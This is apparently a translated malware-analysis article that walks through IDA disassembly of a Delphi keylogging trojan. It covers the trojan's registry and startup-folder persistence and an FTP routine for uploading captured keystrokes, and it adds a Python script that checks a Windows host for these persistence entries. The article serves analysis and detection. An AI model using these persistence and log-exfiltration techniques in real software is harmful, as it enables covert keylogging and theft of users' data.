CODE:004337D3 jnz short loc_433814
CODE:004337D3
CODE:004337D5 push offset dword_433918
CODE:004337DA lea edx, [ebp+var_14]
CODE:004337DD xor eax, eax
CODE:004337DF call System::ParamStr(int)
CODE:004337DF
CODE:004337E4 push [ebp+var_14]
CODE:004337E7 push offset dword_433918
CODE:004337EC lea eax, [ebp+var_10]
CODE:004337EF mov edx, 3
CODE:004337F4 call System::__linkproc__ LStrCatN(void)
CODE:004337F4
CODE:004337F9 mov eax, [ebp+var_10]
CODE:004337FC push eax
CODE:004337FD mov ecx, ds:off_436270
CODE:00433803 mov ecx, [ecx]
CODE:00433805 mov edx, offset s->SoftwareMicrosoftWindowsCurrentversionRunonce_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:0043380A mov eax, HKEY_LOCAL_MACHINE
CODE:0043380F call _Create_RegKey
CODE:0043380F
CODE:00433814
CODE:00433814 loc_433814: ; CODE XREF: _Set_Reg_Info+77j
CODE:00433814 cmp byte ptr [ebx], 1
CODE:00433817 jnz short loc_433825
CODE:00433817
CODE:00433819 mov eax, ds:off_4361AC ; address of the relevant decoded config field goes into EAX
CODE:0043381E mov eax, [eax] ; fetch the decoded config field, here svchost
CODE:00433820 call _Create_Run_RegKey
CODE:00433820
CODE:00433825
CODE:00433825 loc_433825: ; CODE XREF: _Set_Reg_Info+BBj
CODE:00433825 cmp byte ptr [ebx+1], 1
CODE:00433829 jnz short loc_433837
CODE:00433829
CODE:0043382B mov eax, ds:off_436270
CODE:00433830 mov eax, [eax]
CODE:00433832 call _Create_RunOnce_RegKey
CODE:00433832
CODE:00433837
CODE:00433837 loc_433837: ; CODE XREF: _Set_Reg_Info+CDj
CODE:00433837 cmp byte ptr [ebx+2], 1
CODE:0043383B jnz short loc_433849
CODE:0043383B
CODE:0043383D mov eax, ds:off_4360F0
CODE:00433842 mov eax, [eax] ; the decoded config string "{4fz8rk-15aq-16nc-23or4-2ke0fa051515}" goes into EAX
CODE:00433844 call _Create_Component_RegKey
CODE:00433844
CODE:00433849
CODE:00433849 loc_433849: ; CODE XREF: _Set_Reg_Info+DFj
CODE:00433849 cmp byte ptr [ebx+3], 1
CODE:0043384D jnz short loc_43385B
CODE:0043384D
CODE:0043384F mov eax, ds:off_436044
CODE:00433854 mov eax, [eax] ; here the decoded config string pschost
CODE:00433856 call _Create_Dir_and_CopyFile
CODE:00433856
CODE:0043385B
CODE:0043385B loc_43385B: ; CODE XREF: _Set_Reg_Info+F1j
CODE:0043385B cmp byte ptr [ebx+4], 1
CODE:0043385F jnz short loc_433866
CODE:0043385F
CODE:00433861 call _Create_Winlogon_RegKey
CODE:00433861
CODE:00433866
CODE:00433866 loc_433866: ; CODE XREF: _Set_Reg_Info+103j
CODE:00433866 cmp byte ptr [ebx+5], 1
CODE:0043386A jnz short loc_433871
CODE:0043386A
CODE:0043386C call _Create_Winlogon_Shell_RegKey
CODE:0043386C
CODE:00433871
CODE:00433871 loc_433871: ; CODE XREF: _Set_Reg_Info+10Ej
CODE:00433871 xor eax, eax
CODE:00433873 pop edx
CODE:00433874 pop ecx
CODE:00433875 pop ecx
CODE:00433876 mov fs:[eax], edx
CODE:00433879 push offset loc_433893
CODE:00433879
CODE:0043387E
CODE:0043387E loc_43387E: ; CODE XREF: _Set_Reg_Info+135j
CODE:0043387E lea eax, [ebp+var_14]
CODE:00433881 mov edx, 5
CODE:00433886 call System::__linkproc__ LStrArrayClr(void *,int)
CODE:00433886
CODE:0043388B retn
CODE:0043388B
CODE:0043388C ; ---------------------------------------------------------------------------
CODE:0043388C
CODE:0043388C loc_43388C: ; DATA XREF: _Set_Reg_Info+14o
CODE:0043388C jmp unknown_libname_48 ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043388C
CODE:00433891 ; ---------------------------------------------------------------------------
CODE:00433891 jmp short loc_43387E
CODE:00433891
CODE:00433893 ; ---------------------------------------------------------------------------
CODE:00433893
CODE:00433893 loc_433893: ; CODE XREF: _Set_Reg_Info+12Fj
CODE:00433893 ; DATA XREF: _Set_Reg_Info+11Do
CODE:00433893 pop ebx
CODE:00433894 mov esp, ebp
CODE:00433896 pop ebp
CODE:00433897 retn
CODE:00433897
CODE:00433897 _Set_Reg_Info endp
Among these,
CODE:00433856 call _Create_Dir_and_CopyFile
is what creates the files. Looking inside this CALL:
CODE:00414C34 _Create_Dir_and_CopyFile proc near ; CODE XREF: _Set_Reg_Info+FAp
CODE:00414C34
CODE:00414C34 var_20 = dword ptr -20h
CODE:00414C34 var_1C = dword ptr -1Ch
CODE:00414C34 var_18 = dword ptr -18h
CODE:00414C34 var_14 = dword ptr -14h
CODE:00414C34 var_10 = dword ptr -10h
CODE:00414C34 var_C = dword ptr -0Ch
CODE:00414C34 var_8 = dword ptr -8
CODE:00414C34 var_4 = dword ptr -4
CODE:00414C34
CODE:00414C34 push ebp
CODE:00414C35 mov ebp, esp
CODE:00414C37 xor ecx, ecx
CODE:00414C39 push ecx
CODE:00414C3A push ecx
CODE:00414C3B push ecx
CODE:00414C3C push ecx
CODE:00414C3D push ecx
CODE:00414C3E push ecx
CODE:00414C3F push ecx
CODE:00414C40 push ecx
CODE:00414C41 mov [ebp+var_4], eax
CODE:00414C44 mov eax, [ebp+var_4]
CODE:00414C47 call System::__linkproc__ LStrAddRef(void *)
CODE:00414C47
CODE:00414C4C xor eax, eax
CODE:00414C4E push ebp
CODE:00414C4F push offset loc_414D35
CODE:00414C54 push dword ptr fs:[eax]
CODE:00414C57 mov fs:[eax], esp
CODE:00414C5A lea eax, [ebp+var_C]
CODE:00414C5D call _Get_System_Dir
CODE:00414C5D
CODE:00414C62 push [ebp+var_C]
CODE:00414C65 push offset asc_414D48 ; "\\"
CODE:00414C6A push [ebp+var_4]
CODE:00414C6D lea eax, [ebp+var_8]
CODE:00414C70 mov edx, 3
CODE:00414C75 call System::__linkproc__ LStrCatN(void)
CODE:00414C75
CODE:00414C7A mov eax, [ebp+var_8]
CODE:00414C7D call Sysutils::DirectoryExists(System::AnsiString)
CODE:00414C7D
CODE:00414C82 test al, al
CODE:00414C84 jnz short loc_414C96
CODE:00414C84
CODE:00414C86 push 0 ; lpSecurityAttributes
CODE:00414C88 mov eax, [ebp+var_8]
CODE:00414C8B call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414C8B
CODE:00414C90 push eax ; lpPathName
CODE:00414C91 call CreateDirectoryA ; create the pschost directory under the system directory, e.g. C:\WINDOWS\system32\pschost
CODE:00414C91
CODE:00414C96
CODE:00414C96 loc_414C96: ; CODE XREF: _Create_Dir_and_CopyFile+50j
CODE:00414C96 lea eax, [ebp+var_10]
CODE:00414C99 mov ecx, offset s->Copia_exe ; "\\copia.exe"
CODE:00414C9E mov edx, [ebp+var_8]
CODE:00414CA1 call System::__linkproc__ LStrCat3(void)
CODE:00414CA1
CODE:00414CA6 mov eax, [ebp+var_10]
CODE:00414CA9 call Sysutils::FileExists(System::AnsiString)
CODE:00414CA9
CODE:00414CAE test al, al
CODE:00414CB0 jnz short loc_414D02
CODE:00414CB0
CODE:00414CB2 push 0 ; bFailIfExists
CODE:00414CB4 push [ebp+var_8]
CODE:00414CB7 push offset asc_414D48 ; "\\"
CODE:00414CBC lea edx, [ebp+var_1C]
CODE:00414CBF xor eax, eax
CODE:00414CC1 call System::ParamStr(int)
CODE:00414CC1
CODE:00414CC6 mov eax, [ebp+var_1C]
CODE:00414CC9 lea edx, [ebp+var_18]
CODE:00414CCC call Sysutils::ExtractFileName(System::AnsiString)
CODE:00414CCC
CODE:00414CD1 push [ebp+var_18]
CODE:00414CD4 lea eax, [ebp+var_14]
CODE:00414CD7 mov edx, 3
CODE:00414CDC call System::__linkproc__ LStrCatN(void)
CODE:00414CDC
CODE:00414CE1 mov eax, [ebp+var_14]
CODE:00414CE4 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414CE4
CODE:00414CE9 push eax ; lpNewFileName
CODE:00414CEA lea edx, [ebp+var_20]
CODE:00414CED xor eax, eax
CODE:00414CEF call System::ParamStr(int)
CODE:00414CEF
CODE:00414CF4 mov eax, [ebp+var_20]
CODE:00414CF7 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00414CF7
CODE:00414CFC push eax ; lpExistingFileName
CODE:00414CFD call CopyFileA ; copy the trojan file into the newly created pschost directory under the system directory
CODE:00414CFD
CODE:00414D02
CODE:00414D02 loc_414D02: ; CODE XREF: _Create_Dir_and_CopyFile+7Cj
CODE:00414D02 mov eax, [ebp+var_8]
CODE:00414D05 push eax
CODE:00414D06 mov ecx, offset s->CommonStartup ; "Common Startup"
CODE:00414D0B mov edx, offset s->SoftwareMicrosoftWindowsCurrentversionExplorerUserShellFo ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
CODE:00414D10 mov eax, HKEY_LOCAL_MACHINE
CODE:00414D15 call _Create_RegKey ; set the Common Startup value under HKEY_LOCAL_MACHINE\SOFTWARE
CODE:00414D15 ; \Microsoft\Windows\CurrentVersion\Explorer
CODE:00414D15 ; \User Shell Folders
CODE:00414D15 ; to the directory just created
CODE:00414D15
CODE:00414D1A xor eax, eax
CODE:00414D1C pop edx
CODE:00414D1D pop ecx
CODE:00414D1E pop ecx
CODE:00414D1F mov fs:[eax], edx
CODE:00414D22 push offset loc_414D3C
CODE:00414D22
CODE:00414D27
CODE:00414D27 loc_414D27: ; CODE XREF: _Create_Dir_and_CopyFile+106j
CODE:00414D27 lea eax, [ebp+var_20]
CODE:00414D2A mov edx, 8
CODE:00414D2F call System::__linkproc__ LStrArrayClr(void *,int)
CODE:00414D2F
CODE:00414D34 retn
CODE:00414D34
CODE:00414D35 ; ---------------------------------------------------------------------------
CODE:00414D35
CODE:00414D35 loc_414D35: ; DATA XREF: _Create_Dir_and_CopyFile+1Bo
CODE:00414D35 jmp unknown_libname_48 ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00414D35
CODE:00414D3A ; ---------------------------------------------------------------------------
CODE:00414D3A jmp short loc_414D27
CODE:00414D3A
CODE:00414D3C ; ---------------------------------------------------------------------------
CODE:00414D3C
CODE:00414D3C loc_414D3C: ; CODE XREF: _Create_Dir_and_CopyFile+100j
CODE:00414D3C ; DATA XREF: _Create_Dir_and_CopyFile+EEo
CODE:00414D3C mov esp, ebp
CODE:00414D3E pop ebp
CODE:00414D3F retn
CODE:00414D3F
CODE:00414D3F _Create_Dir_and_CopyFile endp
After the above processing, the following registry settings are made. Each of them is gated by one of the six flag bytes from the decoded configuration (the cmp byte ptr [ebx+n], 1 tests in _Set_Reg_Info), so a given infected host may show only a subset:
1. Under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, an SCISound value is created whose data is the trojan's path and file name with the parameter /lanzateRunOnce
2. The trojan's path and file name are appended to the Shell value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
3. Under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, an svchost value is added whose data is the trojan's path and file name
4. Under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components, a key {4fz8rk-15aq-16nc-23or4-2ke0fa051515} is created, and under
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4fz8rk-15aq-16nc-23or4-2ke0fa051515} a StubPath value is created whose data is the trojan's path and file name with the parameter /lanzateActiveX
5. If a pschost directory was created under the system directory (e.g. C:\WINDOWS\system32), the data of
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup is changed to that new directory
6. The trojan's path and file name are appended to the Userinit value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
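A quick way to triage a host for the six autostart locations listed above is to compare them with their stock values rather than hunt for the file name, which the config can change. The following is an added example, not part of the original analysis: check_persistence() flags a modified Winlogon Shell or Userinit, a redirected Common Startup folder, Active Setup components whose key is not a well-formed GUID (this sample's {4fz8rk-15aq-16nc-23or4-2ke0fa051515} is not), and Run/RunOnce entries named after system binaries or carrying this sample's command-line switches; collect_snapshot() reads the live keys with winreg when run on Windows. The expected defaults, the constructed INFECTED and CLEAN snapshots and all function names are mine. The check reads only the native registry view; a 32-bit dropper on 64-bit Windows may have written its Run entry under the Wow6432Node view as well.

```python
from __future__ import annotations
import re

try:
    import winreg                      # present only on Windows
except ImportError:
    winreg = None

# Paths relative to HKLM\SOFTWARE\Microsoft\ (the locations written by _Set_Reg_Info)
RUN_KEY = r"Windows\CurrentVersion\Run"
RUNONCE_KEY = r"Windows\CurrentVersion\RunOnce"
WINLOGON_KEY = r"Windows NT\CurrentVersion\Winlogon"
ACTIVE_SETUP_KEY = r"Active Setup\Installed Components"
SHELL_FOLDERS_KEY = r"Windows\CurrentVersion\Explorer\User Shell Folders"

# Assumed stock values for the host; anything appended to them is a finding.
EXPECTED_SHELL = "explorer.exe"
USERINIT_RE = re.compile(r"^(?:[a-z]:\\windows\\system32\\)?userinit\.exe,?$", re.I)
COMMON_STARTUP_RE = re.compile(r"(?:%programdata%|%allusersprofile%|start menu).*\\startup$", re.I)
GUID_RE = re.compile(r"^\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}$", re.I)
SYSTEM_NAMES = {"svchost", "lsass", "csrss", "winlogon", "services"}
SAMPLE_SWITCHES = ("/lanzate", "/instalando", "/reactivate")   # this sample's own switches


def check_persistence(snapshot: dict) -> list[str]:
    """snapshot: {'run': {name: cmd}, 'runonce': {name: cmd}, 'shell': str,
    'userinit': str, 'common_startup': str, 'active_setup': {guid: stubpath}}"""
    findings: list[str] = []
    for key in ("run", "runonce"):
        for name, cmd in snapshot.get(key, {}).items():
            if name.lower() in SYSTEM_NAMES or any(s in cmd.lower() for s in SAMPLE_SWITCHES):
                findings.append(f"{key}: suspicious entry {name!r} -> {cmd!r}")
    shell = snapshot.get("shell", EXPECTED_SHELL)
    if shell.strip().lower() != EXPECTED_SHELL:
        findings.append(f"Winlogon\\Shell modified: {shell!r}")
    userinit = snapshot.get("userinit", "userinit.exe,")
    if not USERINIT_RE.match(userinit.strip()):
        findings.append(f"Winlogon\\Userinit modified: {userinit!r}")
    common = snapshot.get("common_startup", "")
    if common and not COMMON_STARTUP_RE.search(common):
        findings.append(f"User Shell Folders\\Common Startup redirected to {common!r}")
    for guid, stub in snapshot.get("active_setup", {}).items():
        if not GUID_RE.match(guid):
            findings.append(f"Active Setup component with malformed GUID {guid!r} -> {stub!r}")
    return findings


def _values(path: str) -> dict[str, str]:
    """All values of HKLM\\SOFTWARE\\Microsoft\\<path> as strings; {} if the key is absent."""
    out: dict[str, str] = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft" + "\\" + path) as k:
            for i in range(winreg.QueryInfoKey(k)[1]):
                name, data, _ = winreg.EnumValue(k, i)
                out[name] = str(data)
    except OSError:
        pass
    return out


def _subkeys(path: str) -> list[str]:
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft" + "\\" + path) as k:
            return [winreg.EnumKey(k, i) for i in range(winreg.QueryInfoKey(k)[0])]
    except OSError:
        return []


def collect_snapshot() -> dict:
    """Read the live keys on the Windows host under analysis."""
    if winreg is None:
        raise RuntimeError("winreg unavailable: run this on the Windows host under analysis")
    winlogon = _values(WINLOGON_KEY)
    return {
        "run": _values(RUN_KEY),
        "runonce": _values(RUNONCE_KEY),
        "shell": winlogon.get("Shell", EXPECTED_SHELL),
        "userinit": winlogon.get("Userinit", "userinit.exe,"),
        "common_startup": _values(SHELL_FOLDERS_KEY).get("Common Startup", ""),
        "active_setup": {g: _values(ACTIVE_SETUP_KEY + "\\" + g).get("StubPath", "")
                         for g in _subkeys(ACTIVE_SETUP_KEY)},
    }


# Constructed snapshots, not real captures. INFECTED mirrors the six writes listed above.
INFECTED = {
    "run": {"svchost": r"C:\WINDOWS\RSTray.exe"},
    "runonce": {"SCISound": r"C:\WINDOWS\RSTray.exe /lanzateRunOnce"},
    "shell": r"Explorer.exe C:\WINDOWS\RSTray.exe",
    "userinit": r"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\RSTray.exe",
    "common_startup": r"C:\WINDOWS\system32\pschost",
    "active_setup": {"{4fz8rk-15aq-16nc-23or4-2ke0fa051515}": r"C:\WINDOWS\RSTray.exe /lanzateActiveX"},
}
CLEAN = {
    "run": {"IgfxTray": r"C:\WINDOWS\system32\igfxtray.exe"},
    "runonce": {},
    "shell": "Explorer.exe",
    "userinit": r"C:\WINDOWS\system32\userinit.exe,",
    "common_startup": r"%ALLUSERSPROFILE%\Start Menu\Programs\Startup",
    "active_setup": {"{01234567-89ab-cdef-0123-456789abcdef}": r"C:\WINDOWS\system32\ie4uinit.exe"},
}

if __name__ == "__main__":
    for line in check_persistence(INFECTED):
        print(line)
```

On a live host run check_persistence(collect_snapshot()); the Common Startup check treats an empty value as "not present" rather than as a finding, because the key is only rewritten when the pschost flag is set.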
----------------------------------------------------------------------------------------------------------
4. Keylogging
I won't paste the keylogging code, it is fairly long. It just sets a timer, scans the keyboard and writes the log files.
Finally there is the FTP part, which creates the iklogs directory on the FTP server and uploads the logs generated on your machine; I'll skip it here:
CODE:00432D30 _FTP_Work proc near ; DATA XREF: CODE:00431264o
CODE:00432D30
CODE:00432D30 var_178 = dword ptr -178h
CODE:00432D30 var_174 = dword ptr -174h
CODE:00432D30 var_170 = dword ptr -170h
CODE:00432D30 var_16C = dword ptr -16Ch
CODE:00432D30 var_168 = dword ptr -168h
CODE:00432D30 var_164 = dword ptr -164h
CODE:00432D30 var_160 = byte ptr -160h
CODE:00432D30 var_154 = dword ptr -154h
CODE:00432D30 var_8 = dword ptr -8
CODE:00432D30 var_4 = dword ptr -4
CODE:00432D30
CODE:00432D30 push ebp
CODE:00432D31 mov ebp, esp
CODE:00432D33 add esp, 0FFFFFE88h
CODE:00432D39 push ebx
CODE:00432D3A push esi
CODE:00432D3B push edi
CODE:00432D3C xor edx, edx
CODE:00432D3E mov [ebp+var_178], edx
CODE:00432D44 mov [ebp+var_174], edx
CODE:00432D4A mov [ebp+var_170], edx
CODE:00432D50 mov [ebp+var_16C], edx
CODE:00432D56 mov [ebp+var_168], edx
CODE:00432D5C mov [ebp+var_164], edx
CODE:00432D62 mov [ebp+var_4], edx
CODE:00432D65 mov [ebp+var_8], edx
CODE:00432D68 lea eax, [ebp+var_160]
CODE:00432D6E mov edx, off_406540
CODE:00432D74 call unknown_libname_68 ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00432D74
CODE:00432D79 xor eax, eax
CODE:00432D7B push ebp
CODE:00432D7C push offset loc_433129
CODE:00432D81 push dword ptr fs:[eax]
CODE:00432D84 mov fs:[eax], esp
CODE:00432D87 mov ds:byte_437A3C, 1
CODE:00432D8E push 0
CODE:00432D90 push 0
CODE:00432D92 push 0
CODE:00432D94 push 1
CODE:00432D96 push offset s->Iexplore ; "iexplore"
CODE:00432D9B call InternetOpenA
--------------------------------------------------------------------------------
[Copyright]: This article is purely for technical exchange. When reposting, please credit the author and keep the article intact, thanks!